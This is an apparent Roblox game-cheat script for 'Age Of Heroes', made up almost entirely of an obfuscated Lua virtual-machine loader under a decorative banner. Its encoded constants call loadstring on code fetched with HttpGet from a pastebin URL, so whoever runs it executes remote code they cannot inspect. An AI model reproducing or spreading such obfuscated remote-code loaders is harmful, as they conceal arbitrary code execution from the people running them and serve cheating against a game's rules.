--[[
 

â–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ•— â–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ•—â–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ•—  â–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ•— â–ˆâ–ˆâ•—   â–ˆâ–ˆâ•—â–ˆâ–ˆâ–ˆâ•—   â–ˆâ–ˆâ•—â–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ•—     
â–ˆâ–ˆâ•”â•â•â–ˆâ–ˆâ•—â–ˆâ–ˆâ•”â•â•â•â•â•â–ˆâ–ˆâ•”â•â•â–ˆâ–ˆâ•—â–ˆâ–ˆâ•”â•â•â•â–ˆâ–ˆâ•—â–ˆâ–ˆâ•‘   â–ˆâ–ˆâ•‘â–ˆâ–ˆâ–ˆâ–ˆâ•—  â–ˆâ–ˆâ•‘â–ˆâ–ˆâ•”â•â•â–ˆâ–ˆâ•—    
â–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ•”â•â–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ•—  â–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ•”â•â–ˆâ–ˆâ•‘   â–ˆâ–ˆâ•‘â–ˆâ–ˆâ•‘   â–ˆâ–ˆâ•‘â–ˆâ–ˆâ•”â–ˆâ–ˆâ•— â–ˆâ–ˆâ•‘â–ˆâ–ˆâ•‘  â–ˆâ–ˆâ•‘    
â–ˆâ–ˆâ•”â•â•â–ˆâ–ˆâ•—â–ˆâ–ˆâ•”â•â•â•  â–ˆâ–ˆâ•”â•â•â–ˆâ–ˆâ•—â–ˆâ–ˆâ•‘   â–ˆâ–ˆâ•‘â–ˆâ–ˆâ•‘   â–ˆâ–ˆâ•‘â–ˆâ–ˆâ•‘â•šâ–ˆâ–ˆâ•—â–ˆâ–ˆâ•‘â–ˆâ–ˆâ•‘  â–ˆâ–ˆâ•‘    
â–ˆâ–ˆâ•‘  â–ˆâ–ˆâ•‘â–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ•—â–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ•”â•â•šâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ•”â•â•šâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ•”â•â–ˆâ–ˆâ•‘ â•šâ–ˆâ–ˆâ–ˆâ–ˆâ•‘â–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ•”â•    
â•šâ•â•  â•šâ•â•â•šâ•â•â•â•â•â•â•â•šâ•â•â•â•â•â•  â•šâ•â•â•â•â•â•  â•šâ•â•â•â•â•â• â•šâ•â•  â•šâ•â•â•â•â•šâ•â•â•â•â•â• 
                 Age Of Heroes Script Remastered ðŸ˜€
                 Also dont Skid.. Please :)


]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v85=0 -0 ;local v86;while true do if (v85==(0 -0)) then v86=(v31/(((3 + 0) -1)^(v32-1)))%((4 -2)^(((v33-(620 -(555 + 64))) -(v32-(1 -0))) + (932 -(857 + 74)))) ;return v86-(v86%(569 -(367 + 201))) ;end end else local v87=927 -(214 + 713) ;local v88;while true do if ((0 + 0)==v87) then v88=(1 + 1)^(v32-1) ;return (((v31%(v88 + v88))>=v88) and (878 -(282 + 595))) or ((2702 -(68 + 997)) -(1523 + 114)) ;end end end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34,v35,v36,v37=v1(v16,v19,v19 + ((2230 -(892 + 65)) -(226 + 1044)) );v19=v19 + (17 -13) ;return (v37 * (16777333 -(32 + (202 -117)))) + (v36 * (64226 + 1310)) + (v35 * ((104 -47) + (364 -165))) + v34 ;end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v38=1002 -(241 + 761) ;local v39;local v40;local v41;local v42;local v43;local v44;local v45;local v46;while true do if (v38~=(0 + 0)) then else v39=0;v40=nil;v38=1 + 0 ;end if (v38==(9 -6)) then v45=nil;v46=nil;v38=4;end if (v38==4) then while true do if (v39~=1) then else v42=nil;v43=nil;v39=6 -4 ;end if (v39==0) then v40=0;v41=nil;v39=1;end if (v39~=2) then else local v100=0;while true do if (v100~=(375 -(123 + 251))) then else v39=14 -11 ;break;end if (v100==(698 -(208 + 490))) then v44=nil;v45=nil;v100=1 + 0 ;end end end if (v39~=3) then else v46=nil;while true do local v101=0;while true do if ((1 + 0)~=v101) then else if (v40==(837 -(660 + 176))) then local v137=0;local v138;while true do if (0==v137) then v138=0 + 0 ;while true do if (v138==1) then v46={};v40=204 -(14 + 188) ;break;end if (v138==(675 -(534 + 141))) then local v160=0;while true do if (v160~=0) then else v44={v41,v42,nil,v43};v45=v24();v160=1 -0 ;end if (v160==(1 -0)) then v138=2 -1 ;break;end end end end break;end end end if (v40~=3) then else local v139=0 + 0 ;while true do if (0~=v139) then else local v148=0 + 0 ;while true do if ((396 -(115 + 281))~=v148) then else for v162=1,v24() do v42[v162-1 ]=v29();end return v44;end end end end end break;end if (v101==(0 -0)) then if (v40~=(2 + 0)) then else local v140=0 -0 ;while true do if (v140==0) then for v150=3 -2 ,v45 do local v151=0;local v152;local v153;local v154;local v155;while true do if ((868 -(550 + 317))~=v151) then else v154=nil;v155=nil;v151=2;end if (v151==2) then while true do if (v152~=(0 -0)) then else v153=0 -0 ;v154=nil;v152=2 -1 ;end if (v152==1) then v155=nil;while true do if (v153==1) then if (v154==1) then v155=v22()~=(285 -(134 + 151)) ;elseif (v154==2) then v155=v25();elseif (v154==(1668 -(970 + 695))) then v155=v26();end v46[v150]=v155;break;end if ((0 -0)==v153) then local v170=1990 -(582 + 1408) ;local v171;while true do if (v170~=0) then else v171=0;while true do if (v171==1) then v153=1;break;end if (v171==(0 -0)) then local v181=0;while true do if (v181==1) then v171=1;break;end if (v181==0) then v154=v22();v155=nil;v181=1 -0 ;end end end end break;end end end end break;end end break;end if (v151==(0 -0)) then v152=1824 -(1195 + 629) ;v153=nil;v151=1;end end end v44[3]=v22();v140=1;end if (v140==1) then for v156=1 -0 ,v24() do local v157=241 -(187 + 54) ;local v158;local v159;while true do if (v157==(781 -(162 + 618))) then while true do if (v158~=(0 + 0)) then else v159=v22();if (v21(v159,1,1 + 0 )==0) then local v164=0;local v165;local v166;local v167;local v168;while true do if (2~=v164) then else while true do if (v165==(1 -0)) then local v173=0;local v174;local v175;while true do if (v173==(0 -0)) then v174=0 + 0 ;v175=nil;v173=1637 -(1373 + 263) ;end if ((1001 -(451 + 549))~=v173) then else while true do if (v174~=(0 + 0)) then else v175=0;while true do if ((0 -0)~=v175) then else local v186=0 -0 ;while true do if (v186==0) then local v191=1384 -(746 + 638) ;while true do if (v191==(1 + 0)) then v186=1;break;end if (v191~=(0 -0)) then else v168={v23(),v23(),nil,nil};if (v166==(560 -(306 + 254))) then local v192=0;local v193;while true do if (v192==(0 + 0)) then v193=0;while true do if (v193~=(0 -0)) then else v168[1470 -(899 + 568) ]=v23();v168[4]=v23();break;end end break;end end elseif (v166==(1 + 0)) then v168[7 -4 ]=v24();elseif (v166==(605 -(268 + 335))) then v168[293 -(60 + 230) ]=v24() -(2^(588 -(426 + 146))) ;elseif (v166~=3) then else local v198=0 + 0 ;local v199;local v200;while true do if (v198==(1456 -(282 + 1174))) then v199=0;v200=nil;v198=812 -(569 + 242) ;end if (1~=v198) then else while true do if (v199==(0 -0)) then v200=0 + 0 ;while true do if (0==v200) then v168[3]=v24() -((1026 -(706 + 318))^16) ;v168[4]=v23();break;end end break;end end break;end end end v191=1;end end end if (v186==1) then v175=1252 -(721 + 530) ;break;end end end if (1==v175) then v165=1273 -(945 + 326) ;break;end end break;end end break;end end end if (v165==0) then local v176=0;local v177;while true do if (v176~=(0 -0)) then else v177=0 + 0 ;while true do if (v177~=(701 -(271 + 429))) then else v165=1;break;end if (v177==0) then local v184=0 + 0 ;while true do if (v184==(1501 -(1408 + 92))) then v177=1087 -(461 + 625) ;break;end if (v184==0) then v166=v21(v159,1290 -(993 + 295) ,1 + 2 );v167=v21(v159,4,6);v184=1;end end end end break;end end end if (v165==(1174 -(418 + 753))) then if (v21(v167,3,3)~=(1 + 0)) then else v168[4]=v46[v168[1 + 3 ]];end v41[v156]=v168;break;end if (v165==2) then local v179=0 + 0 ;local v180;while true do if (v179~=(0 + 0)) then else v180=529 -(406 + 123) ;while true do if (v180==1) then v165=3;break;end if (v180==(1769 -(1749 + 20))) then local v185=0 + 0 ;while true do if (v185==(1322 -(1249 + 73))) then if (v21(v167,1,1)==1) then v168[2]=v46[v168[2]];end if (v21(v167,2,2)==1) then v168[3]=v46[v168[3]];end v185=1;end if (v185==(1 + 0)) then v180=1146 -(466 + 679) ;break;end end end end break;end end end end break;end if (v164==(2 -1)) then local v172=0 -0 ;while true do if (v172==0) then v167=nil;v168=nil;v172=1;end if (v172~=(1901 -(106 + 1794))) then else v164=1 + 1 ;break;end end end if (v164==0) then v165=0 + 0 ;v166=nil;v164=1;end end end break;end end break;end if (v157==(0 -0)) then v158=0 -0 ;v159=nil;v157=115 -(4 + 110) ;end end end v40=3;break;end end end if (v40~=0) then else local v141=584 -(57 + 527) ;local v142;while true do if (0==v141) then v142=0;while true do if (v142~=0) then else local v161=1427 -(41 + 1386) ;while true do if (v161==(103 -(17 + 86))) then v41={};v42={};v161=1;end if (v161~=(1 + 0)) then else v142=1;break;end end end if (v142~=1) then else v43={};v40=1 -0 ;break;end end break;end end end v101=1;end end end break;end end break;end if (v38==(2 -1)) then v41=nil;v42=nil;v38=2;end if (v38~=(168 -(122 + 44))) then else v43=nil;v44=nil;v38=3;end end end v30=nil;v18=7;end if (v18==4) then function v25()local v47=0 -(0 -0) ;local v48;local v49;local v50;local v51;local v52;local v53;while true do if (v47==(0 -0)) then v48=v24();v49=v24();v47=1 + 0 ;end if (v47==(1 + 1)) then v52=v21(v49,759 -(542 + 196) ,31);v53=((v21(v49,68 -36 )==(1 -0)) and  -((124 -58) -(30 + 35))) or (1 + 0) ;v47=1260 -((2905 -1862) + 214) ;end if (v47==1) then v50=3 -2 ;v51=(v21(v49,1 + 0 ,1232 -(285 + 38 + 889) ) * ((5 -3)^(612 -(361 + 219)))) + v48 ;v47=322 -(53 + (597 -330)) ;end if (v47==(1 + 2)) then if (v52==((410 + 3) -(15 + 398))) then if (v51==(982 -(18 + 964))) then return v53 * (1121 -(118 + 585 + 418)) ;else v52=2 -1 ;v50=0 -0 ;end elseif (v52==(505 + 681 + 861)) then return ((v51==(0 + 0)) and (v53 * ((4 -3)/(0 -0)))) or (v53 * NaN) ;end return v8(v53,v52-(1873 -(12 + 8 + 830)) ) * (v50 + (v51/(((1732 -(239 + 514)) -(553 + 424))^(41 + 11)))) ;end end end v26=nil;function v26(v54)local v55;if  not v54 then v54=v24();if (v54==(0 + 0)) then return "";end end v55=v3(v16,v19,(v19 + v54) -(1330 -(797 + 532)) );v19=v19 + v54 ;local v56={};for v69=1 + 0 , #v55 do v56[v69]=v2(v1(v3(v55,v69,v69)));end return v6(v56);end v18=5;end if (v18==2) then function v22()local v57=0 + 0 ;local v58;while true do if (v57==(0 -0)) then v58=v1(v16,v19,v19);v19=v19 + (1203 -((1503 -(369 + 761)) + 829)) ;v57=732 -(476 + 255) ;end if (v57==1) then return v58;end end end v23=nil;function v23()local v59=0 + 0 ;local v60;local v61;while true do if (v59==(1 -(216 -(42 + 174)))) then return (v61 * (484 -228)) + v60 ;end if ((238 -(64 + 174))==v59) then v60,v61=v1(v16,v19,v19 + 1 + 0 + 1 );v19=v19 + (2 -0) ;v59=337 -(144 + 192) ;end end end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v62)if (v1(v62,2)==79) then local v89=0;while true do if (v89==0) then v20=v0(v3(v62,1,1));return "";end end else local v90=v2(v0(v62,16));if v20 then local v94=0;local v95;while true do if (v94==1) then return v95;end if (v94==0) then v95=v5(v90,v20);v20=nil;v94=1;end end else return v90;end end end);v18=1;end if (v18==7) then function v30(v63,v64,v65)local v66=v63[1];local v67=v63[2];local v68=v63[3];return function(...)local v71=v66;local v72=v67;local v73=v68;local v74=v28;local v75=1;local v76= -1;local v77={};local v78={...};local v79=v12("#",...) -1 ;local v80={};local v81={};for v91=0,v79 do if (v91>=v73) then v77[v91-v73 ]=v78[v91 + 1 ];else v81[v91]=v78[v91 + 1 ];end end local v82=(v79-v73) + 1 ;local v83;local v84;while true do v83=v71[v75];v84=v83[1];if (v84<=3) then if (v84<=1) then if (v84>0) then local v102=v83[2];local v103=v81[v83[3]];v81[v102 + 1 ]=v103;v81[v102]=v103[v83[4]];else do return;end end elseif (v84>2) then local v107=0;local v108;local v109;local v110;local v111;while true do if (v107==0) then v108=v83[2];v109,v110=v74(v81[v108](v13(v81,v108 + 1 ,v83[3])));v107=1;end if (v107==1) then v76=(v110 + v108) -1 ;v111=0;v107=2;end if (v107==2) then for v143=v108,v76 do v111=v111 + 1 ;v81[v143]=v109[v111];end break;end end else local v112=0;local v113;while true do if (v112==0) then v113=v83[2];v81[v113]=v81[v113](v13(v81,v113 + 1 ,v76));break;end end end elseif (v84<=5) then if (v84==4) then v81[v83[2]]=v65[v83[3]];else v81[v83[2]]=v83[3];end elseif (v84==6) then v81[v83[2]]();else local v118;local v119,v120;local v121;local v122;v81[v83[2]]=v65[v83[3]];v75=v75 + 1 ;v83=v71[v75];v81[v83[2]]=v65[v83[3]];v75=v75 + 1 ;v83=v71[v75];v122=v83[2];v121=v81[v83[3]];v81[v122 + 1 ]=v121;v81[v122]=v121[v83[4]];v75=v75 + 1 ;v83=v71[v75];v81[v83[2]]=v83[3];v75=v75 + 1 ;v83=v71[v75];v122=v83[2];v119,v120=v74(v81[v122](v13(v81,v122 + 1 ,v83[3])));v76=(v120 + v122) -1 ;v118=0;for v132=v122,v76 do local v133=0;while true do if (v133==0) then v118=v118 + 1 ;v81[v132]=v119[v118];break;end end end v75=v75 + 1 ;v83=v71[v75];v122=v83[2];v81[v122]=v81[v122](v13(v81,v122 + 1 ,v76));v75=v75 + 1 ;v83=v71[v75];v81[v83[2]]();v75=v75 + 1 ;v83=v71[v75];do return;end end v75=v75 + 1 ;end end;end return v30(v29(),{},v17)(...);end end end v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574031D3O00682O7470733A2O2F706173746562696E2E636F6D2F3637796833514C3600083O0012073O00013O00122O000100023O00202O00010001000300122O000300046O000100039O0000026O000100016O00017O00",v9(),...);
